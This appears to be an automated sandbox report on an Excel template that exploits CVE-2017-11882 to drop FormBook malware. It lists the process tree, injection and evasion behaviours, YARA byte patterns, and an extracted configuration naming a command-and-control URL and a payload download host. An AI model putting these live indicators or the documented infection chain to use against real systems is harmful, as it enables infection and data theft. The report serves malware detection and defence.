Loading ...

Play interactive tourEdit tour

Windows Analysis Report New_1007572_021.xltx

Overview

General Information

Sample Name:New_1007572_021.xltx
Analysis ID:458850
MD5:427e80f30505c596c822c141283a5a70
SHA1:d910f9e9ecf2cb8c68f8fca4121bac4bad757a37
SHA256:d1acfa41b1e1fbc076b41547954e6615132256983b0315c50f8dbb97a0399fbd
Tags:xlsxxltx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2624 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2384 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • tynex.exe (PID: 2216 cmdline: C:\Users\Public\tynex.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
      • tynex.exe (PID: 3000 cmdline: C:\Users\user\AppData\Local\Temp\tynex.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
        • FB_BFF5.tmp.exe (PID: 2748 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe' MD5: 74BAFB3E707C7B0C63938AC200F99C7F)
        • FB_C479.tmp.exe (PID: 2724 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe' MD5: 48ECE2CA39A9EAE7FCED7418CF071D46)
          • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • cscript.exe (PID: 2248 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
              • cmd.exe (PID: 1244 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeJoeSecurity_FormBookYara detected FormBookJoe Security
    C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x88e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x956a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1a4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1b4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x17409:$sqlite3step: 68 34 1C 7B E1
      • 0x1751c:$sqlite3step: 68 34 1C 7B E1
      • 0x17438:$sqlite3text: 68 38 2A 90 C5
      • 0x1755d:$sqlite3text: 68 38 2A 90 C5
      • 0x1744b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x17573:$sqlite3blob: 68 53 D8 7F 8C
      00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 34 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.0.FB_C479.tmp.exe.1340000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.0.FB_C479.tmp.exe.1340000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          7.0.FB_C479.tmp.exe.1340000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17609:$sqlite3step: 68 34 1C 7B E1
          • 0x1771c:$sqlite3step: 68 34 1C 7B E1
          • 0x17638:$sqlite3text: 68 38 2A 90 C5
          • 0x1775d:$sqlite3text: 68 38 2A 90 C5
          • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
          4.2.tynex.exe.36294d0.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            4.2.tynex.exe.36294d0.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0xe5c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0xe82a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x1a34d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x19e39:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x1a44f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1a5c7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xf242:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x190b4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xff3b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x201bf:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x211c2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 13 entries

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 160.153.129.234, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2384, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2384, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\tynex.exe, CommandLine: C:\Users\Public\tynex.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\tynex.exe, NewProcessName: C:\Users\Public\tynex.exe, OriginalFileName: C:\Users\Public\tynex.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2384, ProcessCommandLine: C:\Users\Public\tynex.exe, ProcessId: 2216
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\tynex.exe, CommandLine: C:\Users\Public\tynex.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\tynex.exe, NewProcessName: C:\Users\Public\tynex.exe, OriginalFileName: C:\Users\Public\tynex.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2384, ProcessCommandLine: C:\Users\Public\tynex.exe, ProcessId: 2216

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
            Found malware configurationShow sources
            Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exeReversingLabs: Detection: 28%
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeMetadefender: Detection: 45%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeReversingLabs: Detection: 85%
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeReversingLabs: Detection: 28%
            Source: C:\Users\Public\tynex.exeReversingLabs: Detection: 28%
            Multi AV Scanner detection for submitted fileShow sources
            Source: New_1007572_021.xltxReversingLabs: Detection: 39%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeJoe Sandbox ML: detected
            Source: C:\Users\Public\tynex.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeJoe Sandbox ML: detected
            Source: 7.0.FB_C479.tmp.exe.1340000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.2.tynex.exe.36294d0.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 7.2.FB_C479.tmp.exe.1340000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.2.tynex.exe.39186d0.6.unpackAvira: Label: TR/Crypt.XPACK.Gen2
            Source: 5.2.tynex.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.2.tynex.exe.276b818.2.unpackAvira: Label: TR/Dropper.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\tynex.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\tynex.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: wntdll.pdb source: FB_C479.tmp.exe, cscript.exe
            Source: Binary string: cscript.pdbN source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 4x nop then pop esi
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.domoexpra.club/cg53/
            Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
            Source: global trafficHTTP traffic detected: GET /Di4/New_1007572_021.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: inter-trading-service.comConnection: Keep-Alive
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30DB366F.jpgJump to behavior
            Source: global trafficHTTP traffic detected: GET /Di4/New_1007572_021.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: inter-trading-service.comConnection: Keep-Alive
            Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: inter-trading-service.com
            Source: explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
            Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
            Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
            Source: tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000008.00000000.2170296081.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000008.00000000.2176511182.00000000039F0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000008.00000000.2170296081.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
            Source: explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
            Source: explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp3
            Source: explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpT
            Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000008.00000000.2177419686.000000000419A000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.2177529570.0000000004263000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
            Source: explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
            Source: explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
            Source: explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1k

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
